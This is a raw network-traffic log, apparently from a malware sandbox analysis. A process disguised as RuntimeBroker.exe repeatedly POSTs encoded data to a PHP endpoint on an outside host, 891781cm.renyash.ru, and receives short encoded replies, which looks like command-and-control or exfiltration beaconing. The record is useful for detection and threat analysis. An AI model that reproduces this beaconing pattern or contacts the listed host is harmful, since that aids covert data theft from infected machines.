                                                                                                                          Jan 1, 2025 04:23:40.529701948 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:40.881584883 CET1056OUTData Raw: 55 5e 58 56 5f 59 51 59 55 5a 54 59 51 5d 55 53 58 5e 5c 58 59 52 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U^XV_YQYUZTYQ]USX^\XYRRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#)<1Z4=[%=7X&'>:'8\3Y"V',<--8_=>4*,#^!'^)?
                                                                                                                          Jan 1, 2025 04:23:40.973340988 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:41.230324984 CET806INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jmyYiG5OoZDMLsx1%2FwheKf%2B9sHDda7rSUrLYwRB7cMZJRBm6T6Eq2j22XFzxriABhqutUnIQdkVnEajMa9Dbhh5nfnE9EKbK9SXYcva70d17r%2FgLVA7RtP%2Fjm4EEECSeQ8mbTBce"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf645ccebf43b5-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1667&rtt_var=831&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=585874&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          131192.168.2.450138104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:41.360270977 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:41.709315062 CET1056OUTData Raw: 55 52 58 54 5f 5b 51 5a 55 5a 54 59 51 58 55 53 58 58 5c 59 59 54 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: URXT_[QZUZTYQXUSXX\YYTR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \?6!8=_1=9)$'419$/$<-'<+8- ^=-'=,#^!'^)+
                                                                                                                          Jan 1, 2025 04:23:41.833806992 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:42.014357090 CET807INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16QssMDt5mBe%2Fuiuq3nvOIueSIHKIqCAEVFxkm%2BR9b9NNPmfBap3u1ePUoUMx9zfhASC6wfKJL7wjpuAn%2BnurGxrcdrLMV2yflB4l6SJ0EseTzUjAt2WfbapKqUe9SnwSUuO%2BcxJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64623fc643f8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3909&min_rtt=2446&rtt_var=3843&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=103180&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          132192.168.2.450139104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:42.133455038 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1044
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:42.491514921 CET1044OUTData Raw: 50 52 58 54 5a 56 51 5b 55 5a 54 59 51 5b 55 55 58 53 5c 5e 59 56 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PRXTZVQ[UZTYQ[UUXS\^YVR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(=[7=Z&*$0.$(_'*'0;<'),#^!'^)
                                                                                                                          Jan 1, 2025 04:23:42.579343081 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:42.843203068 CET803INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:42 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmTlukQSb3PPdKD%2BewZUaNUhcYTifF2F3E31BPkBNY1ARykk%2BxKWn9RBSgiUk2XThhChPjG6OB26466WrMNalIH6SKpA0UrKQwhuSgbE0JZS45SbRBlHStNHNWIkMIfoCsaNI4SM"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6466d8dd41d2-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2990&min_rtt=2486&rtt_var=1942&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1388&delivery_rate=223754&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          133192.168.2.450140104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:42.980890036 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:43.334719896 CET1056OUTData Raw: 50 54 58 5c 5a 5b 51 5e 55 5a 54 59 51 59 55 54 58 5c 5c 5c 59 57 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTX\Z[Q^UZTYQYUTX\\\YWRS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ]+Y=X#2$=5\*.03$)93"W'?';>?(.)<#^!'^)/
                                                                                                                          Jan 1, 2025 04:23:43.424834013 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:43.610357046 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:43 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SS7W6aPSJaFZmVdh8Yvrr2WMhOZOyQ86BNzXLJvguTHUZIpkpaBE3%2Fqx8PQIUNVFdOqco7Yt7ZfuoGJ6NZYad3LKeZ6TgVmPIUVne%2Fh%2BeqoLv%2B3hxuOYKRD5bCh6X%2FT7wXktsLvu"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf646c2eaf4319-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1867&min_rtt=1647&rtt_var=1058&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=428026&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          134192.168.2.450141104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:43.747339010 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:44.100087881 CET1056OUTData Raw: 55 51 58 5c 5a 5b 51 5b 55 5a 54 59 51 53 55 53 58 52 5c 58 59 5d 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQX\Z[Q[UZTYQSUSXR\XY]R\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(,=X &=!\>>Y$2W:'(]$Y!3<Z-- <8W>#^!'^)
                                                                                                                          Jan 1, 2025 04:23:44.201528072 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:44.458863020 CET814INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:44 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fr12rTwdsJiAzCDB1kOp27Ytrvz3TJVQDo4jaYGMAn3qSDS0Gq%2BMhYIoXF0vbsRwwNs7JOEjogBwBsdhxDFr%2B%2BOL4cSOWc%2FQMVgLP6%2FQ%2FPLafef2HgENDDpH%2ByvO1g7sGulsdRZw"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6470f9907c93-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4355&min_rtt=1879&rtt_var=5658&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=67302&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          135192.168.2.450142104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:44.585930109 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:44.943722963 CET1056OUTData Raw: 50 51 58 57 5a 5e 51 5e 55 5a 54 59 51 5e 55 52 58 5d 5c 58 59 51 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQXWZ^Q^UZTYQ^URX]\XYQRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#)/-!+!1.6>'X$B>V9$Y0<*P3,3;((.(*<#^!'^)3
                                                                                                                          Jan 1, 2025 04:23:45.057805061 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:45.317728043 CET803INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:45 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMTHfnCEXXL1S3Uo0Npj4ZvXSm%2B7R1v4lnJUlWh8XD81CQuBROzi6rFSHl9URosAX9HPzabGyfedIYktZFYsWIHPauSHkNzn%2FAeiEkVUKvNKksIxaYdj9eVSrLfqOu5c6BVRxoaR"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64764a0118f6-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3073&min_rtt=1553&rtt_var=3623&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=106429&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          136192.168.2.450143104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:45.448190928 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:45.803076982 CET1056OUTData Raw: 55 53 58 57 5f 5b 51 55 55 5a 54 59 51 5c 55 54 58 5b 5c 5e 59 50 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: USXW_[QUUZTYQ\UTX[\^YPRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ](=X7!%-5X==/^31- Y'/&T',+X->(]+'>#^!'^)
                                                                                                                          Jan 1, 2025 04:23:45.900849104 CET25INHTTP/1.1 100 Continue


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          137192.168.2.450144104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:46.121961117 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:46.475008965 CET1780OUTData Raw: 50 52 58 53 5a 59 51 5e 55 5a 54 59 51 52 55 5c 58 52 5c 5d 59 55 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PRXSZYQ^UZTYQRU\XR\]YURR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+1] "2*='7!9$ _0?.3,X/>?>3*<#^!'^)
                                                                                                                          Jan 1, 2025 04:23:46.577122927 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:46.850414038 CET951INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:46 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JEjddTZC42%2Fa4yXGx5GgxDJP1hs6pyQTI8tlsyixB1UsWw6s7vRvZVPHUs5rgXB8W48cXHU6sU4Y8Y6LfgbN59UpGmqtvg3SoELng5odVdsv%2FIo6D3O0K4rOBPeFuZfSy2w1E4lI"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf647fdddf7d16-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4909&min_rtt=2438&rtt_var=5858&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=65727&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 54 33 38 2b 14 2b 3e 04 10 38 2f 24 0c 25 2f 39 01 30 30 09 02 31 00 25 5d 39 3b 2c 5b 28 15 02 01 32 04 03 59 23 31 04 5a 26 0c 2e 5d 04 1d 25 13 2a 29 2a 14 3f 2c 35 58 2a 22 30 1b 30 37 37 11 26 42 20 13 26 3d 39 04 35 0b 3f 54 27 23 27 0d 3f 00 27 59 27 3d 26 50 23 10 2e 57 0d 12 21 0d 31 3e 13 54 2a 31 3f 0c 22 12 3b 57 24 3f 3f 1d 27 02 2b 09 21 28 32 54 2a 11 27 00 21 24 3d 56 33 03 2f 5f 22 39 29 5b 35 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"T38++>8/$%/9001%]9;,[(2Y#1Z&.]%*)*?,5X*"0077&B &=95?T'#'?'Y'=&P#.W!1>T*1?";W$??'+!(2T*'!$=V3/_"9)[5#"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          138192.168.2.450145104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:46.247695923 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:46.599898100 CET1056OUTData Raw: 55 55 5d 50 5a 5b 51 54 55 5a 54 59 51 5f 55 56 58 5c 5c 59 59 52 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UU]PZ[QTUZTYQ_UVX\\YYRRZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \?)Y4;9X$-"=#'$:$,$)0<0/<S*,#^!'^)7
                                                                                                                          Jan 1, 2025 04:23:46.691423893 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:46.868993044 CET812INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:46 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBczLoZtQxBXyLgfa%2BnTyUDba3brUanQmkgfuT5ujevwWxP%2FvzhxoAYfPgEuC2jxOOymo%2BsWcO1%2FnRO9EiQStXloOsoc%2BpOb6I166w16Wr%2BGn%2Bfdwnf3vVUPDD1FoavWUNZxuN66"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64808cf9424c-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1775&rtt_var=704&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=756084&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          139192.168.2.450146104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:47.189982891 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:47.537570953 CET1056OUTData Raw: 55 5e 58 5c 5a 5b 54 5d 55 5a 54 59 51 59 55 57 58 5d 5c 5c 59 56 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
